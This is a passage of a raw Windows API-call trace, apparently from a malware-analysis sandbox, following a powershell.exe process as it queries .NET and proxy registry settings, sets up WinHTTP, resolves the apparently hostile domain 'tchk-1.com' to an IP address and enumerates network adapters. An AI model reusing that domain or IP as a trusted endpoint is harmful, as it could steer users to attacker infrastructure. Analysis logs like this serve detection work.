lphModule=0x2ae34f4, lpcbNeeded=0x5a0ebd8) returned 1 [0117.070] EnumProcessModules (in: hProcess=0x438, lphModule=0x2ae3600, cb=0x200, lpcbNeeded=0x5a0ebd8 | out: lphModule=0x2ae3600, lpcbNeeded=0x5a0ebd8) returned 1 [0117.072] GetModuleInformation (in: hProcess=0x438, hModule=0x320000, lpmodinfo=0x2ae3840, cb=0xc | out: lpmodinfo=0x2ae3840*(lpBaseOfDll=0x320000, SizeOfImage=0x6b000, EntryPoint=0x32d330)) returned 1 [0117.072] CoTaskMemAlloc (cb=0x804) returned 0x5bdb6f8 [0117.073] GetModuleBaseNameW (in: hProcess=0x438, hModule=0x320000, lpBaseName=0x5bdb6f8, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0117.073] CoTaskMemFree (pv=0x5bdb6f8) [0117.073] CoTaskMemAlloc (cb=0x804) returned 0x5bdb6f8 [0117.073] GetModuleFileNameExW (in: hProcess=0x438, hModule=0x320000, lpFilename=0x5bdb6f8, nSize=0x800 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0117.074] CoTaskMemFree (pv=0x5bdb6f8) [0117.074] CloseHandle (hObject=0x438) returned 1 [0117.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3a [0117.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x3a, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0117.074] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Uri.AllowAllUriEncodingExpansion", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0ebd0 | out: phkResult=0x5a0ebd0*=0x0) returned 0x2 [0117.075] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0ebd0 | out: phkResult=0x5a0ebd0*=0x438) returned 0x0 [0117.075] RegQueryValueExW (in: hKey=0x438, lpValueName="AllowAllUriEncodingExpansion", lpReserved=0x0, lpType=0x5a0ebec, lpData=0x0, lpcbData=0x5a0ebe8*=0x0 | out: lpType=0x5a0ebec*=0x0, lpData=0x0, lpcbData=0x5a0ebe8*=0x0) returned 0x2 [0117.075] RegCloseKey (hKey=0x438) returned 0x0 [0117.086] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0ebd0 | out: phkResult=0x5a0ebd0*=0x438) returned 0x0 [0117.086] RegQueryValueExW (in: hKey=0x438, lpValueName="SchUseStrongCrypto", lpReserved=0x0, lpType=0x5a0ebec, lpData=0x0, lpcbData=0x5a0ebe8*=0x0 | out: lpType=0x5a0ebec*=0x0, lpData=0x0, lpcbData=0x5a0ebe8*=0x0) returned 0x2 [0117.086] RegCloseKey (hKey=0x438) returned 0x0 [0117.087] GetCurrentProcessId () returned 0xf88 [0117.087] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xf88) returned 0x438 [0117.087] EnumProcessModules (in: hProcess=0x438, lphModule=0x2ae6f10, cb=0x100, lpcbNeeded=0x5a0ebd4 | out: lphModule=0x2ae6f10, lpcbNeeded=0x5a0ebd4) returned 1 [0117.089] EnumProcessModules (in: hProcess=0x438, lphModule=0x2ae701c, cb=0x200, lpcbNeeded=0x5a0ebd4 | out: lphModule=0x2ae701c, lpcbNeeded=0x5a0ebd4) returned 1 [0117.091] GetModuleInformation (in: hProcess=0x438, hModule=0x320000, lpmodinfo=0x2ae725c, cb=0xc | out: lpmodinfo=0x2ae725c*(lpBaseOfDll=0x320000, SizeOfImage=0x6b000, EntryPoint=0x32d330)) returned 1 [0117.091] CoTaskMemAlloc (cb=0x804) returned 0x5bdb6f8 [0117.091] GetModuleBaseNameW (in: hProcess=0x438, hModule=0x320000, lpBaseName=0x5bdb6f8, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0117.091] CoTaskMemFree (pv=0x5bdb6f8) [0117.092] CoTaskMemAlloc (cb=0x804) returned 0x5bdb6f8 [0117.092] GetModuleFileNameExW (in: hProcess=0x438, hModule=0x320000, lpFilename=0x5bdb6f8, nSize=0x800 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0117.092] CoTaskMemFree (pv=0x5bdb6f8) [0117.092] CloseHandle (hObject=0x438) returned 1 [0117.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3a [0117.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x3a, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0117.093] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.SchSendAuxRecord", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0ebcc | out: phkResult=0x5a0ebcc*=0x0) returned 0x2 [0117.093] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0ebcc | out: phkResult=0x5a0ebcc*=0x438) returned 0x0 [0117.094] RegQueryValueExW (in: hKey=0x438, lpValueName="SchSendAuxRecord", lpReserved=0x0, lpType=0x5a0ebe8, lpData=0x0, lpcbData=0x5a0ebe4*=0x0 | out: lpType=0x5a0ebe8*=0x0, lpData=0x0, lpcbData=0x5a0ebe4*=0x0) returned 0x2 [0117.094] RegCloseKey (hKey=0x438) returned 0x0 [0117.094] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0ebd0 | out: phkResult=0x5a0ebd0*=0x438) returned 0x0 [0117.095] RegQueryValueExW (in: hKey=0x438, lpValueName="SystemDefaultTlsVersions", lpReserved=0x0, lpType=0x5a0ebec, lpData=0x0, lpcbData=0x5a0ebe8*=0x0 | out: lpType=0x5a0ebec*=0x0, lpData=0x0, lpcbData=0x5a0ebe8*=0x0) returned 0x2 [0117.095] RegCloseKey (hKey=0x438) returned 0x0 [0117.096] GetCurrentProcessId () returned 0xf88 [0117.096] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xf88) returned 0x438 [0117.096] EnumProcessModules (in: hProcess=0x438, lphModule=0x2ae9e98, cb=0x100, lpcbNeeded=0x5a0ebd4 | out: lphModule=0x2ae9e98, lpcbNeeded=0x5a0ebd4) returned 1 [0117.098] EnumProcessModules (in: hProcess=0x438, lphModule=0x2ae9fa4, cb=0x200, lpcbNeeded=0x5a0ebd4 | out: lphModule=0x2ae9fa4, lpcbNeeded=0x5a0ebd4) returned 1 [0117.099] GetModuleInformation (in: hProcess=0x438, hModule=0x320000, lpmodinfo=0x2aea1e4, cb=0xc | out: lpmodinfo=0x2aea1e4*(lpBaseOfDll=0x320000, SizeOfImage=0x6b000, EntryPoint=0x32d330)) returned 1 [0117.100] CoTaskMemAlloc (cb=0x804) returned 0x5bdb6f8 [0117.100] GetModuleBaseNameW (in: hProcess=0x438, hModule=0x320000, lpBaseName=0x5bdb6f8, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0117.100] CoTaskMemFree (pv=0x5bdb6f8) [0117.100] CoTaskMemAlloc (cb=0x804) returned 0x5bdb6f8 [0117.100] GetModuleFileNameExW (in: hProcess=0x438, hModule=0x320000, lpFilename=0x5bdb6f8, nSize=0x800 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0117.101] CoTaskMemFree (pv=0x5bdb6f8) [0117.101] CloseHandle (hObject=0x438) returned 1 [0117.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3a [0117.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x3a, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0117.101] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.RequireCertificateEKUs", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0ebcc | out: phkResult=0x5a0ebcc*=0x0) returned 0x2 [0117.102] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0ebcc | out: phkResult=0x5a0ebcc*=0x438) returned 0x0 [0117.102] RegQueryValueExW (in: hKey=0x438, lpValueName="RequireCertificateEKUs", lpReserved=0x0, lpType=0x5a0ebe8, lpData=0x0, lpcbData=0x5a0ebe4*=0x0 | out: lpType=0x5a0ebe8*=0x0, lpData=0x0, lpcbData=0x5a0ebe4*=0x0) returned 0x2 [0117.102] RegCloseKey (hKey=0x438) returned 0x0 [0117.103] QueryPerformanceCounter (in: lpPerformanceCount=0x5a0ecd8 | out: lpPerformanceCount=0x5a0ecd8*=2940191328166) returned 1 [0117.112] GetCurrentProcess () returned 0xffffffff [0117.113] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5a0e8ec | out: TokenHandle=0x5a0e8ec*=0x438) returned 1 [0117.117] CloseHandle (hObject=0x438) returned 1 [0117.117] GetCurrentProcess () returned 0xffffffff [0117.117] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5a0e904 | out: TokenHandle=0x5a0e904*=0x438) returned 1 [0117.118] CloseHandle (hObject=0x438) returned 1 [0117.125] GetCurrentProcess () returned 0xffffffff [0117.126] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5a0ebbc | out: TokenHandle=0x5a0ebbc*=0x438) returned 1 [0117.146] CoTaskMemAlloc (cb=0xcc0) returned 0x5bdb6f8 [0117.146] RasEnumConnectionsW (in: param_1=0x5bdb6f8, param_2=0x5a0ebcc, param_3=0x5a0ebd0 | out: param_1=0x5bdb6f8, param_2=0x5a0ebcc, param_3=0x5a0ebd0) returned 0x0 [0117.161] CoTaskMemFree (pv=0x5bdb6f8) [0117.171] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x5a0e9b4 | out: lpWSAData=0x5a0e9b4) returned 0 [0117.182] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x478 [0117.246] setsockopt (s=0x478, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0117.246] closesocket (s=0x478) returned 0 [0117.247] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x478 [0117.251] setsockopt (s=0x478, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0117.251] closesocket (s=0x478) returned 0 [0117.256] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x478 [0117.257] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x47c [0117.258] ioctlsocket (in: s=0x478, cmd=-2147195266, argp=0x5a0ebd4 | out: argp=0x5a0ebd4) returned 0 [0117.258] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x480 [0117.259] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x484 [0117.259] ioctlsocket (in: s=0x480, cmd=-2147195266, argp=0x5a0ebd4 | out: argp=0x5a0ebd4) returned 0 [0117.260] WSAIoctl (in: s=0x478, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x5a0ebbc, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x5a0ebbc, lpOverlapped=0x0) returned -1 [0117.261] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x5a0e8ec, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0117.263] WSAEventSelect (s=0x478, hEventObject=0x47c, lNetworkEvents=512) returned 0 [0117.263] WSAIoctl (in: s=0x480, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x5a0ebbc, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x5a0ebbc, lpOverlapped=0x0) returned -1 [0117.263] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x5a0e8ec, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0117.263] WSAEventSelect (s=0x480, hEventObject=0x484, lNetworkEvents=512) returned 0 [0117.264] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x488 [0117.264] RasConnectionNotificationW (param_1=0xffffffff, param_2=0x488, param_3=0x3) returned 0x0 [0117.272] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x5a0ebe8 | out: phkResult=0x5a0ebe8*=0x4a0) returned 0x0 [0117.273] RegOpenKeyExW (in: hKey=0x4a0, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0eb9c | out: phkResult=0x5a0eb9c*=0x4a4) returned 0x0 [0117.274] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4a8 [0117.274] RegNotifyChangeKeyValue (hKey=0x4a4, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x4a8, fAsynchronous=1) returned 0x0 [0117.276] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0eba0 | out: phkResult=0x5a0eba0*=0x4ac) returned 0x0 [0117.276] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4b0 [0117.276] RegNotifyChangeKeyValue (hKey=0x4ac, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x4b0, fAsynchronous=1) returned 0x0 [0117.276] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0eba0 | out: phkResult=0x5a0eba0*=0x4b4) returned 0x0 [0117.277] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4b8 [0117.277] RegNotifyChangeKeyValue (hKey=0x4b4, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x4b8, fAsynchronous=1) returned 0x0 [0117.277] GetCurrentProcess () returned 0xffffffff [0117.278] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5a0eb90 | out: TokenHandle=0x5a0eb90*=0x4bc) returned 1 [0117.280] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0e498 | out: phkResult=0x5a0e498*=0x4c0) returned 0x0 [0117.280] RegQueryValueExW (in: hKey=0x4c0, lpValueName="LegacyWPADSupport", lpReserved=0x0, lpType=0x5a0e4b4, lpData=0x0, lpcbData=0x5a0e4b0*=0x0 | out: lpType=0x5a0e4b4*=0x0, lpData=0x0, lpcbData=0x5a0e4b0*=0x0) returned 0x2 [0117.280] RegCloseKey (hKey=0x4c0) returned 0x0 [0117.306] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x66c9d0 [0117.323] WinHttpSetTimeouts (hInternet=0x66c9d0, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1 [0117.324] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x5a0eb9c | out: pProxyConfig=0x5a0eb9c) returned 1 [0117.431] CloseHandle (hObject=0x438) returned 1 [0117.438] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.HttpWebRequest_Disabled", lpBuffer=0x5a0e37c, nSize=0xc9 | out: lpBuffer="") returned 0x0 [0117.439] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.HttpWebRequest_MinCount", lpBuffer=0x5a0e37c, nSize=0xc9 | out: lpBuffer="") returned 0x0 [0117.451] EtwEventRegister () returned 0x0 [0117.462] GetCurrentProcess () returned 0xffffffff [0117.463] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5a0e8b4 | out: TokenHandle=0x5a0e8b4*=0x4f8) returned 1 [0117.466] CloseHandle (hObject=0x4f8) returned 1 [0117.466] GetCurrentProcess () returned 0xffffffff [0117.467] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5a0e8cc | out: TokenHandle=0x5a0e8cc*=0x4f8) returned 1 [0117.467] CloseHandle (hObject=0x4f8) returned 1 [0117.477] SetEvent (hEvent=0x41c) returned 1 [0117.489] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x5a0ead4*=0x488, lpdwindex=0x5a0e8f8 | out: lpdwindex=0x5a0e8f8) returned 0x80010115 [0117.490] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x5a0eab4*=0x47c, lpdwindex=0x5a0e8d8 | out: lpdwindex=0x5a0e8d8) returned 0x80010115 [0117.490] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x5a0eab4*=0x484, lpdwindex=0x5a0e8d8 | out: lpdwindex=0x5a0e8d8) returned 0x80010115 [0117.490] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x5a0eb08*=0x4a8, lpdwindex=0x5a0e92c | out: lpdwindex=0x5a0e92c) returned 0x80010115 [0117.491] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x5a0eb08*=0x4b0, lpdwindex=0x5a0e92c | out: lpdwindex=0x5a0e92c) returned 0x80010115 [0117.491] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x5a0eb08*=0x4b8, lpdwindex=0x5a0e92c | out: lpdwindex=0x5a0e92c) returned 0x80010115 [0117.496] GetCurrentProcess () returned 0xffffffff [0117.496] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5a0e810 | out: TokenHandle=0x5a0e810*=0x510) returned 1 [0117.498] CloseHandle (hObject=0x510) returned 1 [0117.498] GetCurrentProcess () returned 0xffffffff [0117.498] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5a0e828 | out: TokenHandle=0x5a0e828*=0x510) returned 1 [0117.499] CloseHandle (hObject=0x510) returned 1 [0117.500] SetEvent (hEvent=0x41c) returned 1 [0117.511] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x5a0eb34 | out: pFixedInfo=0x0, pOutBufLen=0x5a0eb34) returned 0x6f [0117.549] LocalAlloc (uFlags=0x0, uBytes=0x248) returned 0x6828c0 [0117.549] GetNetworkParams (in: pFixedInfo=0x6828c0, pOutBufLen=0x5a0eb34 | out: pFixedInfo=0x6828c0, pOutBufLen=0x5a0eb34) returned 0x0 [0117.568] LocalFree (hMem=0x6828c0) returned 0x0 [0117.571] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.Connection_Disabled", lpBuffer=0x5a0e290, nSize=0xc9 | out: lpBuffer="") returned 0x0 [0117.571] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.Connection_MinCount", lpBuffer=0x5a0e290, nSize=0xc9 | out: lpBuffer="") returned 0x0 [0117.578] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x520 [0117.580] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x51c [0117.583] GetAddrInfoW (in: pNodeName="tchk-1.com", pServiceName=0x0, pHints=0x5a0ea10*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x5a0e9b8 | out: ppResult=0x5a0e9b8*=0x5be16a8*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="tchk-1.com", ai_addr=0x5be2678*(sa_family=2, sin_port=0x0, sin_addr="84.21.172.160"), ai_next=0x0)) returned 0 [0117.716] FreeAddrInfoW (pAddrInfo=0x5be16a8*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="tchk-1.com", ai_addr=0x5be2678*(sa_family=2, sin_port=0x0, sin_addr="84.21.172.160"), ai_next=0x0)) [0117.717] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x528 [0117.717] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x530 [0117.718] ioctlsocket (in: s=0x528, cmd=-2147195266, argp=0x5a0e9e8 | out: argp=0x5a0e9e8) returned 0 [0117.718] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x534 [0117.719] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x538 [0117.719] ioctlsocket (in: s=0x534, cmd=-2147195266, argp=0x5a0e9e8 | out: argp=0x5a0e9e8) returned 0 [0117.719] WSAIoctl (in: s=0x528, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x5a0e9d0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x5a0e9d0, lpOverlapped=0x0) returned -1 [0117.719] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x5a0e700, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0117.720] WSAEventSelect (s=0x528, hEventObject=0x530, lNetworkEvents=512) returned 0 [0117.720] WSAIoctl (in: s=0x534, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x5a0e9d0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x5a0e9d0, lpOverlapped=0x0) returned -1 [0117.720] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x5a0e700, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0117.720] WSAEventSelect (s=0x534, hEventObject=0x538, lNetworkEvents=512) returned 0 [0117.721] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x0, SizePointer=0x5a0e9cc*=0x0 | out: AdapterAddresses=0x0, SizePointer=0x5a0e9cc*=0x7ec) returned 0x6f [0117.730] LocalAlloc (uFlags=0x0, uBytes=0x7ec) returned 0x5bf9420 [0117.730] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x5bf9420, SizePointer=0x5a0e9cc*=0x7ec | out: AdapterAddresses=0x5bf9420*(Alignment=0x1000000178, Length=0x178, IfIndex=0x10, Next=0x5bf96ec, AdapterName="{68F1467C-143D-484A-87A1-65BCBB1B2D48}", FirstUnicastAddress=0x5bf9660, FirstAnycastAddress=0x0, FirstMulticastAddress=0x0, FirstDnsServerAddress=0x0, DnsSuffix="", Description="Intel(R) 82574L Gigabit Network Connection #5", FriendlyName="Local Area Connection 5", PhysicalAddress=([0]=0x18, [1]=0x59, [2]=0x33, [3]=0xde, [4]=0xe6, [5]=0xfc, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x6, Flags=0x3e5, DdnsEnabled=0x3e5, RegisterAdapterSuffix=0x3e5, Dhcpv4Enabled=0x3e5, ReceiveOnly=0x3e5, NoMulticast=0x3e5, Ipv6OtherStatefulConfig=0x3e5, NetbiosOverTcpipEnabled=0x3e5, Ipv4Enabled=0x3e5, Ipv6Enabled=0x3e5, Ipv6ManagedAddressConfigurationSupported=0x3e5, Mtu=0x5dc, IfType=0x6, OperStatus=0x1, Ipv6IfIndex=0x10, ZoneIndices=([0]=0x10, [1]=0x10, [2]=0x10, [3]=0x10, [4]=0x1, [5]=0x1, [6]=0x1, [7]=0x1, [8]=0x1, [9]=0x1, [10]=0x1, [11]=0x1, [12]=0x1, [13]=0x1, [14]=0x0, [15]=0x1), FirstPrefix=0x0, TransmitLinkSpeed=0x3b9aca00, ReceiveLinkSpeed=0x3b9aca00, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x0, Ipv4Metric=0xa, Ipv6Metric=0xa, Luid=0x600000a000000, Dhcpv4Server.lpSockaddr=0x5bf9598*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.1"), Dhcpv4Server.iSockaddrLength=16, CompartmentId=0x1, NetworkGuid=0x11de7039846ee341, ConnectionType=0x1, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x1, [4]=0x27, [5]=0xbf, [6]=0xe, [7]=0x9e, [8]=0x0, [9]=0x26, [10]=0x67, [11]=0xd5, [12]=0xc6, [13]=0x31, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, 